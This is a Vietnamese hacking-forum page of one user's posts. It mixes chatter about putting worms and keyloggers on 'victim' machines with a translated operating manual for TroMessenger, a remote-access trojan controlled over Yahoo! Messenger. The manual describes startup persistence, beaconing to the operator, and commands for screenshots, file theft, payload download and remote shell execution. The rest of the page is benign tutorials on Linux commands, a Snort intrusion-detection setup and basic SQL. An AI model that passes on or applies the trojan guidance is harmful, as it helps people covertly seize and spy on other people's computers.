banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: moonlight123  XML
Profile for moonlight123 Messages posted by moonlight123 [ number of posts not being displayed on this page: 1 ]
 
bạn Vanxuanemp phát biểu hay lắm thế bạn dùng worm gì vào máy victim khi tất cả là newbie chưa bik biết viết worm thì bạn làm như thế nào ?
smilie
liên hệ tui
tui cho cái video hack mà xem rồi làm theo đừng như là cái máy là được
ban dùng lệnh help/? thì thấy lệnh mình cần
web die hết hay sao vậy các bác
các bác hướng dẫn chi tiết kỹ hơn đi
hình như là sai mục rùi đó bác àh !
các bác mau ra tạp chí cho anh em học tập nha !
LeonHart nói đúng đó các bác ah
từ từ để HVA trở lại như cũ chứ
có thật là ra sách do HVA bien soan không vậy !
đừng đùa chứ !
nếu co thi mail cho tui qua địa chỉ mail : hva_online2003@yahoo.com
:lolsmilie 8)
hay lém bác ah`
nhưng những trương trình này đã có từ rất lâu rùi
mà cũng cám ơn bác đã post cho mọi người tham khảo :wink: smilie)
uh đúng đó
loại keylogg đó chỉ cài được vào máy thzui
victim ngồi vào là dính liền
còn họ khởi động lại thì tui ko rõ cho lém!

(IMG:http://sma-soft.ir/TroMessenger/tro_messenger_11_editserver.JPG)
Translation By: Adon126 @ Yahoo.com

Sơ lược chương trình


Đây là một chương trình xâm nhập và kiểm soát máy tính từ xa thông qua Yahoo! Messenger.
Với công cụ này, bạn có thể kiểm soát bất cứ một máy tính nào bằng cách gửi thông tin qua Yahoo! Messenger ảo thiết lập trong hệ thống.
Từ đó bạn có thể ra lệnh cho máy đối tượng làm theo bất kỳ mệnh lệnh nào.

Cơ chế hoạt động ?
Sau đây là quy trình hoạt động của chương trình sau khi xâm nhập:

0) Chạy vào chương trình khởi động .(Startup).
1) Kiểm soát bộ nhớ hệ thống.
2) Nằm ẩn chờ khi có kết nối vào mạng.
3) Khi máy đối tượng đã kết nối, phát tín hiệu trở về cho máy ID ảo.
4) Gửi thông tin về cho chủ nhân, sau khi quá trình phát tín hiệu thành công.
5) Và bây giờ bạn đã có thể kiểm soát mọi thứ trên máy nạn nhân.


Cấu hình tối thiểu:

1) Hệ điều hành Microsoft Windows XP hoặc Windows Server 2003 . Chương trình không hỗ trợ trên Windows 2000, Windows 98 đến thấp hơn, và hệ thống Linux.
2) 128MB RAM (256MB RAM cấu hình chuẩn)
3) 700Mhz CPU.
4) 8MB Card đồ họa.
5) Dung lượng trống đủ dùng. (Để lưu hình chụp gửi về)
6) Kết nối mạng thường xuyên. Chương trình hoạt động với mọi loại mạng. Ví dụ: Dialup, ADSL, Wireless, Broadband, Satellite, LAN ... v.v
Chương trình vẫn hoạt động với điều kiện truy cập mạng bình thường. Nhưng điều kiện kết nối liên tục thường xuyên sẽ giúp quá trình phát tín hiệu và gửi thông tin tốt hơn.

Tính năng đặc biệt

Không đòi hỏi IP Address ! Đây là ưu thế mạnh nhất của chương trình này. Trong những chương trình trước đây bạn buộc phải có và khai báo một IP Address trong quá trình kiểm soát. Với chương trình này thì không đòi hỏi IP Address.
Nghi vấn - Làm thế nào có thể thực hiện kiểm soát mà không cần IP Address ?
Giải đáp - Bởi vì chương trình này tạo ra hẳn một Yahoo! ID ảo cho bạn, vì vậy bạn không cần phải khai báo IP Address từ máy điều khiển. Mặc dù IP Address vẫn được gửi cho bạn khi kết nối. Nhưng đó chỉ là thông tin cung cấp thêm cho bạn về máy bị kiểm soát, và không có tác dụng gì đối với chương trình TroMessenger.

Chạy ẩn trong hệ thống mạng LAN, kể cả hệ thống Router của máy chủ. Đây là một khuyết điểm của hầu hết các loại Trojan, như là Troya, chỉ hoạt động trên hệ thống có IP tĩnh. Trước đây, bạn phải có được IP Address hợp lệ. Ví dụ: nếu có một hệ thống mạng với 5 máy tính và bạn là một thành viên trong hệ thống mạng đó, bạn có thể truy cập vào các máy khác. Nhưng ai đó nằm ngoài hệ thống mạng này thì không thể truy cập vào bất cứ máy nào trong hệ thống. Bởi vì anh ta không có IP Address hợp lệ để liên kết vào hệ thống. Nhưng giờ đây, vấn đề ĐÃ ĐƯỢC GIẢI QUYẾT với TroMessenger.
Với TroMessenger, bạn có thể truy cập vào bất cứ máy nào ở bất kỳ hệ thống mạng nào. Chỉ cần mọi máy tính được kết nối vào mạng và TroMessenger đang nằm ẩn bên trong.

Các kiểu lệnh

Trong phiên bản này, đây là một số câu lệnh khởi đầu cho việc kiểm soát.

/Result Kết quả của quá trình thực thi sẽ được gửi về ngay sau khi quá trình hoàn tất. Nhưng nếu như nội dung của kết quả gửi về quá dài (nhiều hơn 200 ký tự), nó sẽ được gửi lần lượt, liên tục. Bởi vì Yahoo! Messenger không cho phép nội dung có số ký tự vượt quá giới hạn đã định sẵn.

/cmd - Tương tự MS-DOS Command Prompt. Bạn có thể thực thi lệnh DOS trên máy bị kiểm soát, và nhận được kết quả. Các lệnh như: DIR , VER , VOL , IPConfig , Netstat , WHOAMI v.v ... đều có thể được sử dụng như lệnh DOS.
Ví dụ: /cmd dir C:\*.txt]

Các kiểu lệnh thực thi DOS
Bạn có thể thực thi một số lệnh DOS đặc biệt để khai thác thông tin từ phía máy bị kiểm soát.

/cmd dir - Xem danh sách các tập tin và thư mục. Bạn có thể sử dụng linh động các thông số để khai thác thông tin cụ thể nhất. Ví dụ: /cmd dir /on , /cmd dir *.txt

/cmd ipconfig - Lấy thông tin truy cập. Câu lệnh có chức năng khai thác thông tin từ thiết bị mạng đang sử dụng trên máy bị kiểm soát. Nó sẽ truy ra tên thiết bị mạng, địa chỉ IP, cổng vào, DNS Server ... v.v

/cmd tasklist - Lấy danh sách các chương trình đang hoạt động. Tương tự như Windows Task Manager. Nhưng dưới giao diện DOS.

/cmd whoami - Cung cấp thông tin để xác định máy qua mạng. Thông tin gửi về gồm : TÊN MIỀN / TÊN NHÓM MẠNG , Tên máy tính và tên truy cập máy tính sử dụng WINDOWS. Lưu ý : Câu lệnh này chỉ hoạt động với Windows Server 2003. Không hỗ trợ trên Windows XP.

/cmd netstat - Hiển thị hệ thống mạng và tất cả kết nối hiện có trên máy tính. Để đạt tốc độ nhanh, sử dụng /cmd netstat -na

Khai thác thông tin của máy tính:
Chỉ việc sử dụng câu lệnh này, bạn có thể lấy được thông tin chính từ máy đối tượng.

/IP - cho biết địa chỉ IP. Một máy tính có thể có nhiều hơn một địa chỉ IP khi hoạt động. Ví dụ : bạn có một tài khoản để kết nối internet, và máy tính của bạn đang nằm trong một khu vực kết nối mạng nội bộ (LAN). Vì vậy bạn sẽ có 2 địa chỉ IP ấn định trong máy tính. TroMessenger sẽ gửi toàn bộ địa chỉ IP hiện hành trên máy tính.

/osname - cho bạn biết đầy đủ về tên của Hệ điều hành Windows và tên các phiên bản cập nhật. Ví dụ : Windows Server 2003 Service Pack 1.

/computername: cho biết tên thiết lập của máy trên hệ thống mạng. Các máy tính nhận dạng nhau qua tên này. Nếu máy tính hiện thời chưa được kết nối, không thành vấn đề, nội dung sẽ được gửi ngay sau đó.

/winusername: cho biết tài khoản quản lý sử dụng Windows. Đặc biệt trong Windows XP, có thể sẽ có nhiều tài khoản sử dụng cùng một máy. Và thông tin này sẽ được thay đổi mỗi khi người sử dụng truy cập.
Nhưng với Windows Server 2003 tên này luôn được trả về Administrator. Tuy nhiên dân Admin đã biết chuyển tên tài khoản. nhưng thông thường đa số Admin lại quên làm.

/yahooid - Cho biết tên Yahoo ID của người cuối cùng đang bị kiểm soát.

Những chức năng chính

/Help - Hiển thị các lệnh hợp lệ của TroMessenger. Sẽ có nhiều câu lệnh hơn trong những phiên bản mới. Lúc đó bạn chỉ cần sử dụng lệnh này.

/screenshot - Cho bạn ảnh chụp màn hình của máy tính đối tượng.
Nghi vấn - Yahoo! Messenger là chương trình viết bằng ngữ lệnh, làm sao TroMessenger có thể cho tôi xem ảnh chụp ?
Giải đáp - TroMessenger cho bạn ảnh ngay tức khắc. Có nghĩa là : chụp sao lại màn hình, sau đó tải lên mạng, và gửi đến bạn một liên kết để xem ảnh.

/download - Tải về một thứ gì đó và lưu lại trên máy đối tượng. Bạn sẽ được thông báo khi quá trình hoàn tất.
Câu lệnh: /download "http://www.hostname.com/folder/file.zip" "C:\SavedFile.zip"
Chú ý: Bạn phải sử dụng dấu ngoặc ("). Nếu quên, quá trình tải về sẽ không thực hiện được.

/restart - Khởi động lại máy tính.
Chú ý: Nếu bạn chạy thử nghiệm trên máy tính của bạn, bạn sẽ bị khởi động ngay lập tức mà không có tín hiệu thông báo nào. Và những chương trình trên máy sẽ bị mất. Hãy cẩn thận khi sử dụng câu lệnh này. Tương tự như Shutdown command.

/shutdown - Tắt máy tính. (Lặp lại chú ý)

/time , /date - Hiển thị ngày và giờ.

/ejectcd - Mở ổ đĩa CD-ROM.

/closecd - Đóng ổ đĩa CD-ROM sau khi mở.

/view - Hiển thị nội dung của văn bản. Lưu ý: nếu văn bản nhiều hơn ... ký tự, nó sẽ được ngắt ra thành nhiều phần để gửi liên tiếp nhau.

/getfile - tải bất kỳ tập tin nào lên mạng và gửi liên kết tải về cho bạn. Được sử dụng khi bạn muốn đọc những tập tin không phải là tập tin văn bản từ máy đối tượng

/status , /idle , /busy - Đặt tín hiệu hiển thị cho địa chỉ ảo. Như là tín hiệu Busy hoặc Idle Icons bên cạnh ID.
Câu lệnh ví dụ :
/status Toiyeuem.
/idle Dangantoi.
/busy Hiendangban.

/cancel - Đình chỉ câu lệnh đang thực hiện. Ví dụ khi bạn muốn xem một tập tin văn bản có dung lượng 1MB. Và nội dung đang được gửi đi từng phần, nhưng rồi bạn cảm thấy chán và không muốn xem nữa và muốn gửi một lệnh khác. Chỉ cần dùng lệnh /cancel là xong.

/login - Đăng nhập tài khoản sử dụng quản lý. Mỗi khi TroMessenger khởi động, nếu bạn không được xác nhận là chủ quản lý của chương trình, nhưng bạn biết mật khẩu, bạn sẽ sử dụng /login your password để bắt đầu điều khiển chương trình. Không sử dụng dấu ngoặc cho mật khẩu....

phù....xong rùi...mình edit muốn mệt lun à!! nào các bạn cho một chàng vỗ tay..động viên đi há...
Have fun

các bác nói cũng có lý
nhưng để diễn đàn trở lai như củ cũng là một vấn đề rất lớn
sao ko post tiếp vậy
co nhiu đó hả
post tiep đ chứ
mất đi những bài hay cũ thật tiết hết sức
lại phải bắt đầu từ con số 0 trzui` ạh :lol:
cp tương tự như lệnh copy của DOS, dùng để chép file hoặc thư mục từ nơi này đến nơi khác.

Cú pháp: cp [tham_số] <file_hoặc_thư_mục_nguồn> <file_hoặc_thư_mục_đích>

Ví dụ:

cp /tmp/myfile.txt myfile.text

cp /home/*.cgi ./

cp -r /usr/nbthanh1 /usr/nbthanh2
rm tương tự như lệnh del trong DOS, lệnh này dùng để xoá file.

Cú pháp: rm <tên_file_muốn_xoá>

Ví dụ:

rm myfile.txt

rm /usr/nbthanh/nbtfile.txt

rm /tmp/*
mv tương tự như lênh move (ngoại trú) của DOS. Lệnh này sẽ di chuyển/đổi tên file từ nơi này đến nơi khác.

Cú pháp: mv <file_hoặc_thư_mục_nguồn> <file_hoặc_thư_mục_đích>

Ví dụ về di chuyển:

mv /tmp/myfile.txt /usr/nbthanh

mv myfolder /tmp

mv /usr/* /tmp

Ví dụ về đổi tên, vừa di chuyển vừa đổi tên:

mv myfile1.txt myfile2.txt

mv /usr/oldfoler ./newfolder
cat tương tự như lệnh type của DOS. Lệnh này dùng để hiển thị nội dung của 1 file lên màn hình.

Cú pháp: cat <tên_file_cần_hiển_thị>

Ví dụ:

cat myfile.txt

cat /tmp/temp.text
Vậy là đã xong, tôi đã trình bày với bạn một số lệnh căn bản nhất của Linux. Bạn tự mình ra bài tập và thực hành nhé! Có thể bạn sẽ thắc mắc là tại sao không có lệnh nào tương tự như copy con trong DOS? Vâng đúng là như vậy, trong Linux, để tạo file thì bạn phải dùng một chương trình cụ thể (như một chương trình soạn thảo văn bản chẳng hạn) chứ không có lệnh tương tự nhu copy con của DOS
Làm quen với Linux

Linux là hệ điều hành đa người dùng, nghĩa là nhiều người có thể truy cập và sử dụng 1 máy tính cài Linux. Mỗi người muốn sử dụng được máy tính cài Linux thì phải có 1 account đã được đăng ký. Một accout gồm có 1 username và 1 password. Hai người khác nhau sẽ có 2 username khác nhau (nhưng password thì có thể trùng nhau). Để có thể bắt đầu thao tác và sử dụng, người dùng phải thực hiện thao tác đăng nhập (login và hệ thống). Quá trình này tóm gọn lại là 2 thao tác nhập vào username và password. Username và password cũng phân biệt chữ hoa và chữ thường. Và khi nhập vào password, trên màn hình sẽ không hiển thị bất cứ ký tự nào
Linux có 1 account đặc biệt là account root. Đây là user có cấp cao nhất, có toàn quyền "sinh sát" đối với toàn hệ thống.
Mỗi người dùng trên Linux được cấp một thư mục riêng (gọi là home directory), là một thư mục con của /usr. Có dạng /usr/username; nghĩa là nếu username bạn là nbthanh thì home directory của bạn là /usr/nbthanh. Riêng đối với accout root thì home directory là /root. Các user có thể cùng thuộc một nhóm (group) hoặc là khác nhóm; các user trong cùng một nhóm thì có quyền hạn như nhau. Thường thì tất cả các user đều thuộc vào nhóm User (trừ root và các account dành riêng cho hệ thống).

User chỉ có quyền thao tác trong home directory của mình (và những thư mục khác được phép của hệ thống) mà thôi. User này không thể truy cập vào home directory của user khác (trừ trường hợp được chính user đó hoặc root cho phép). Mỗi tập tin (file) và thư mục trên Linux đều được "đăng ký chủ quyền", nghĩa là thuộc về một user và nhóm nào đó. Thường thì tập tin và thư mục được tạo bởi user nào thì sẽ thuộc về user đó. VD username của bạn là nbthanh, bạn thuộc nhóm user và bạn tạo ra 1 tập tin có tên là myfile.txt thì tập tin myfile.txt sẽ được đánh dấu là "người sử hữu: nbthanh; thuộc về nhóm: user". Những user khác không thể truy cập được myfile.txt nếu không được phép của bạn. Bạn hoàn toàn có thể thay đổi "chủ sở hữu" của tập tin/thư mục bằng các lệnh của Linux. Bạn hoàn toàn có thể đặt myfile.txt thuộc về user nbthanh nhưng lại thuộc về nhóm guests (mặc dù user nbthanh không nằm trong nhóm guests).

Một số lệnh căn bản của Linux

Đây là các lệnh trong chế độ text và được gõ từ bàn phím. Các lệnh phải được gõ chính xác (vì Linux phân biệt giữ chữ hoa và chữ thường!). Sau khi gõ xong một lệnh bạn đừng quên nhấn Enter để Linux bắt đầu thực hiện lệnh đó! smilie Lưu ý thêm là những gì tôi ghi giữa 2 ngoặc nhọn (< và >smilie là bắt buộc phải có, giữa hai ngoặc vuông ([ và ]) là tuỳ chọn (không bắt buộc). Và cuối cùng: đừng quên dùng lệnh man để xem thêm thông tin hướng dẫn về các lệnh

Lệnh Công dụng - Cách dùng - Cú pháp
exit

logout trong text mode, Linux cung cấp cho bạn 6 desktop (tty1...tty6) để làm việc. Bạn có thể bật chuyển qua lại giữa các desktop bằng cách nhấn tổ hợp phím Alt-F1...Alt-F6. Hai lệnh exit và logout kết thúc phiên làm việc của desktop hiện tại và trở về màn hình login.

Cú pháp:

exit

logout
chown lệnh này dùng để thay đổi "chủ sở hữu" của 1 tập tin hay thư mục, tức là gán cho tập tin hoặc thư mục chỉ điịnh thuộc về quyền sở hữu của một user nào đó.

Cú pháp:

chown username[.groupname] <tên_file_hoặc_thư_mục>

chown .groupname <tên_file_hoặc_thư_mục>

Bạn cung cấp username thì file/thư mục sẽ được đặt là thuộc quyền sở hữu của username đó. Nếu bạn cung cấp groupname thì file/thư mục sẽ thuộc về nhóm groupname đó. Hai phần này độc lập với nhau, thay đổi quyền sở hữu user sẽ không làm thay đổi quyền sở hữu group và ngược lại.
Ví dụ: có file guestfile.txt thuộc về user abc thuộc về group guests, có một user nbthanh thuộc về nhóm moderators, file myfile.txt thuộc về quyền sở hữu của nbthanh và thuộc về nhóm moderator.
Bạn có thể download, sử dụng và phổ biến bài viết này tuỳ ý bạn. Hoàn toàn free.

:!: smilie :wink:
ESC: đây là phím Esc ở góc trái, phía trên của bàn phìm, trước khi nhấn Ctrl-C để kết thúc chương trình, bạn hãy thử nhấn ESC trước xem sao.

ENTER: đây là phím Enter trên bàn phím, chắc là tôi khỏi phải giới thiệu về chức năng của phím này nữa chứ nhỉ?

Một số lệnh căn bản của Linux

Các lệnh được trình bày sau đây tôi sẽ cố gắng so sánh nó với một lệnh tương tự trong DOS để nếu như bạn đã biết qua các lệnh của DOS rồi thì sẽ dễ hiểu hơn. Còn nếu bạn chưa từng biết qua các lệnh của DOS? Cũng không sao, bạn sẽ biết được thêm cùng 1 lúc các lệnh của Linux và DOS. Chú ý, đây là các lệnh trong chế độ text và được gõ từ bàn phím. Các lệnh phải được gõ chính xác (vì Linux phân biệt giữ chữ hoa và chữ thường!). Và dĩ nhiên là sau khi gõ xong một lệnh thì bạn đừng quên nhấn Enter để Linux bắt đầu thực hiện lệnh đó! smilie Lưu ý thêm là những gì tôi ghi giữa 2 ngoặc nhọn (< và >smilie là bắt buộc phải có, giữa hai ngoặc vuông ([ và ]) là tuỳ chọn (không bắt buộc). :wink:

Lệnh Công dụng - Cách dùng - Cú pháp

man đây có lẽ là lệnh mà bạn cần phải nhớ kỹ (đừng bao giờ quên!). Lệnh này tương tự như lệnh Help trong DOS. man sẽ hiển thị các thông tin chi tiết về cộng dụng, cách dùng và cú pháp của một lệnh khác (dĩ nhiên là các thông tin đều bằng tiếng Anh).

Cú pháp: man <tên_lệnh_khác>
Và bạn hoàn toàn có thể gõ man man để hiển thị các thông tin giúp đỡ về chính lệnh man!
Lưu ý: để thoát (kết thúc) lệnh man, bạn hãy gõ vào ký tự hai chấm ( sau đó gõ tiếp ký tự q. Nếu không thành công, bạn hãy nhấn phím ESC và thử lại lần nữa. Bạn cũng có thể nhấn Ctrl-C để thoát khỏi man.
ls lệnh này tương tự như lệnh dir trong DOS. ls sẽ liệt kê danh sách tất cả các file và thư mục nằm trong một thư mục mà bạn chỉ định.

Cú pháp chung: ls [tham_số] [thư_mục]

Nếu như bạn cung cấp phần thư_mục thì ls sẽ liệt kê các file trong thư mục hiện tại.
Ví dụ:

ls

ls -a

ls -al /usr
Một số tham số của ls như sau:
a: liệt kê tất cả các file, kể cả file ẩn, là những file mà tên bắt đầu bằng dấu chấm (.)

-A: liệt kê tất cả các file, kể cả file ẩn, nhưng không liệt kê . và .., đây tên của thư mục hiện tại và thư mục cha trong Linux.

-l: liệt kê chi tiết về file (bao gồm các thông tin như thời gian tạo, kích thước, thuộc tính...).
Bạn hãy tự mình tìm hiểu thêm về các tham số khác của ls nhé! (dùng man ls). Và đừng quên dùng man cho các lệnh tiếp theo.

:wink:
cd lệnh này tương tự như lệnh cd trong DOS. Dùng để chuyển tới một thư mục khác.

Cú pháp: cd [tên_thư_mục]

Ví dụ: cd /home
Nếu bạn không cung cấp tên_thư_mục thì cd sẽ đưa bạn về thư mục "tổ ấm" (home directory) của bạn. Trong Linux, mỗi người sử dụng đều có một home directory. Nếu username của bạn là nbthanh thì home directory của bạn sẽ là /usr/nbthanh. Riêng account root sẽ có home directory là /root.

pwd lệnh này tương tự như lênh cd (không có tham số) trong DOS. Lệnh này sẽ hiển thị lên màn hình cho bạn biết là bạn hiện đang ở thư mục nào.

Cú pháp: pwd
mkdir tương tự như lệnh md của DOS. Lệnh này dùng để tạo một thư mục mới.

Cú pháp: mkdir <tên_thư_mục_muốn_tạo>

Ví dụ:

mkdir mydir

mkdir /tmp/mydir2
rmdir tương tự như lệnh rm trong DOS, dùng để xoá một thư mục.

Cú pháp: rmdir <thư_mục_muốn_xoá>

Ví dụ:

rmdir mydir

rmdir /tmp/mydir2

rmdir /tmp/*
Lưu ý: bạn chỉ có thể xoá được thư mục nếu như nó rỗng, nghĩa là nó không chứa một file hoặc thư mục con nào nữa (ngoài . và ..).
Làm quen với cấu trúc file của Linux

Nhìn "bề nổi" thì cấu trúc và cách tổ chức file của Linux cũng không khác DOS/Windows và các Hệ điều hành khác là mấy. Chỉ có một điểm khác biệt lớn mà bạn cần phải chú ý là cấu trúc thư mục của Linux KHÔNG phân chia thành các ổ đĩa. Cho dù bạn có bao nhiêu ổ đĩa thì tất cả đều bắt đầu từ một thư mục gốc có tên là /. Sau đó là đi vào các thư mục con, mỗi ổ đĩa của bạn sẽ được "map" (ánh xạ) vào một thư mục con riêng biệt (thư mục nào thì còn tuỳ vào phiên bản của Linux và cũng tuỳ bạn qui định).

Thêm 3 điểm khác biệt nhỏ nữa mà bạn cần phải để ý là

- trong đường dẫn của Linux, các thư mục được phân cách nhan bằng ký hiệu / (trong khi với DOS/Windows là ký hiệu \);

- và các tham số của lệnh trong Linux được bắt đầu bằng dấu trừ (-) (VD: ls -l) trong khi với DOS/Windows là ký hiệu / (VD: dir /a); các tham số của Linux có thể được dùng kết hợp với nhau (VD: ls -al, ls -ls...)

- cuối cùng, Linux khác với Windows ở chỗ Linux phân biệt chữ hoa và chữ thường, trong Linux abc và Abc là khác nhau

Một số phím/tổ hợp phím bạn cần biết

Ctrl-C: bạn hãy nhớ kỹ tổ hợp phím này. Trong trường hợp bạn cảm thấy "có cái gì đó bất ổn" xảy ra, hay là chương trình bạn chạy không chịu dừng thì bạn hãy thử nhấn tổ hợp phím này. 99% chương trình của Linux chạy trên chế độ text đều có thể được/bị kết thúc bằng tổ hợp phím này.
Ctrl-Alt-Del: tương tự như trong DOS. Tổ hợp phím này sẽ khởi động lại máy tính.
Ctrl-D: khi một chương trình yêu cầu bạn nhập dữ liệu từ bàn phím, bạn có thể nhấn tổ hợp phín này để báo cho chương trình biết là quá trình nhập dữ liệu đã kết thúc. Tổ hợp phím này sẽ gởi tín hiệu EOF (End Of File) đến chương trình.. Nếu nhấn Ctrl-D mà không thấy "xi nhê", bạn thử gõ vào EOF (ba chữ cái E, O và F) rồi nhấn Enter (phím Enter).
Cài đặt nhanh hệ thống phát hiện xâm nhập dùng Snort+ACID :

Hướng dẫn cài đặt nhanh hệ thống phát hiện xâm nhập (IDS) trên Linux/Unix sử dụng Snort với cơ sở dữ liệu mysql để lưu log, alert và ACID làm giao diện theo dõi.

* Yêu cầu hệ thống:
- mysql-3.23+ http://www.mysql.org/
- apache-1.3+ http://httpd.apache.org/
- php-4.04+ http://www.php.net/
- snort-1.8.3+ http://www.snort.org/
- acid-0.9.6+ http://www.andrew.cmu.edu/~rdanyliw/snort/snortacid.html
- adodb-1.2+ http://php.weblogs.com/adodb
- phplot-4.4.6+ http://phplot.sourceforge.net/ (tuỳ chọn để xem các thống kê dạng biểu đồ đưọc vẽ bằng thư viện gd, yêu cầu php phải được biên dịch hỗ trợ gd)

* Giả thiết:
- Hệ thống đã được cài đặt mysql, apache, php và hoạt động tốt (ví dụ RH 7.2).
- Địa chỉ mạng cục bộ cần theo dõi: 192.168.1.0/24

* Cài đặt snort và cấu hình snort.

Download mã nguồn:
http://www.snort.org/dl/snort-1.8.6.tar.gz

# tar zxvf snort-1.8.6.tar.gz
# cd snort-1.8.6
# ./configure --with-mysql=/usr
# make
# make install
# mkdir /etc/snort
# cp *.rules classification.config snort.conf /etc/snort/

Tạo bảng dữ liệu để lưu trữ snort log, alert:

# mysql -u root -p
mysql> create database snort;
mysql> grant INSERT,SELECT on snort.* to snort@localhost identified by '<password>';
mysql> exit
# mysql snort -u root -p < ./contrib/create_mysqlSửa các thông số sau trong file /etc/snort/snort.conf

var HOME_NET 192.168.1.0/24
...
output database: log, mysql, user=snort password=<password> dbname=snort host=localhost
output database: alert, mysql, user=snort password=<password> dbname=snort host=localhostKhởi động snort:
 

# /usr/local/bin/snort -D -d -v -i eth0 -c /etc/snort/snort.conf

* Cài đặt và cấu hình acid

Download mã nguồn:
http://www.andrew.cmu.edu/~rdanyliw/snort/...0.9.6b21.tar.gz
http://phplens.com/lens/dl/adodb190.tgz
http://prdownloads.sourceforge.net/phplot/...ot-4.4.6.tar.gz

Giải nén và đặt adodb, acid vào thư mục con của httpd DocumentRoot:

# cp acid-0.9.6b21.tar.gz /var/www/html
# tar zxvf acid-0.9.6b21.tar.gz
# cp adodb190.tgz /var/www/html
# tar zxvf adodb190.tgz
# cp phplot-4.4.6.tar.gz /var/www/html
# tar zxvf phplot-4.4.6.tar.gz

Kiểm tra xem php có được cấu hình đúng với gd không:
http://locolhost/phplot-4.4.6/examples/test_setup.php

Nếu không xem được các biểu đồ ví dụ, bạn phải xem lại php có được biên dịch với thư viện gd và đã bật hỗ trợ gd trong /etc/php.ini chưa (extension=gd.so).

Tạo bảng dữ liệu để lưu trữ các alert dành riêng cho acid:
# mysql -u root -p
mysql> create database snort_archive;
mysql> grant INSERT,SELECT on snort.* to snort_archive@localhost identified by '<password>';
mysql> exit
# mysql snort -u root -p < create_acid_tbls_mysql.sql

Cấu hình các thông số cần thiết cho acid trong file acid_conf.php

$DBlib_path = "../adodb";

$DBtype = "mysql";

/* Alert DB connection parameters */

$alert_dbname = "snort";
$alert_host = "localhost";
$alert_port = "";
$alert_user = "snort";
$alert_password = "<password>";

/* Archive DB connection parameters */

$archive_dbname = "snort_archive";
$archive_host = "localhost";
$archive_port = "";
$archive_user = "snort";
$archive_password = "<password>";

$ChartLib_path = "../phplot-4.4.6"; // tuỳ chọn, nếu php hỗ trợ gd

/* File format of charts ('png', 'jpeg', 'gif') */
$chart_file_format = "png";
Để an toàn, nên thiết lập yêu cầu xác thực cho các truy xuất đến thư mục acid trên web server.

File /var/www/html/acid/.htaccess:

AuthName ACID Secure Area
AuthType Basic
AuthUserFile /var/www/html/acid/.htpasswd
Allow from all
<limit GET POST>
require valid-user
</limit> 


File /var/www/html/acid/.htpasswd:
acid:<encrypted password>

Thiết lập browser của bạn cho phép tất cả cookie từ host chạy acid. Hoàn tất quá trình cài đặt và bắt đầu sử dụng acid để theo dõi các hoạt động trên mạng được snort phát hiện:

http://localhost/acid/

* Tham khảo tại :

http://www.snort.org/
http://www.andrew.cmu.edu/~rdanyliw/snort/snortacid.htm
Giới thiệu về SQL SQL là chuẩn ngôn ngữ ANSI để truy cập CSDL. SQL là gì? SQL là viết tắt của Structured Query Language - Ngôn ngữ truy vấn cấu trúc. SQL cho phép bạn truy cập vào CSDL. SQL là một chuẩn ngôn ngữ của ANSI. SQL có thể thực thi các câu truy vấn trên CSDL. SQL có thể lấy dữ liệu từ CSDL. SQL có thể chèn dữ liệu mới vào CSDL. SQL có thể xoá dữ liệu trong CSDL. SQL có thể sửa đổi dữ liệu hiện có trong CSDL. SQL dễ học smilie
em ủng hộ các bac hai tay lun
 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|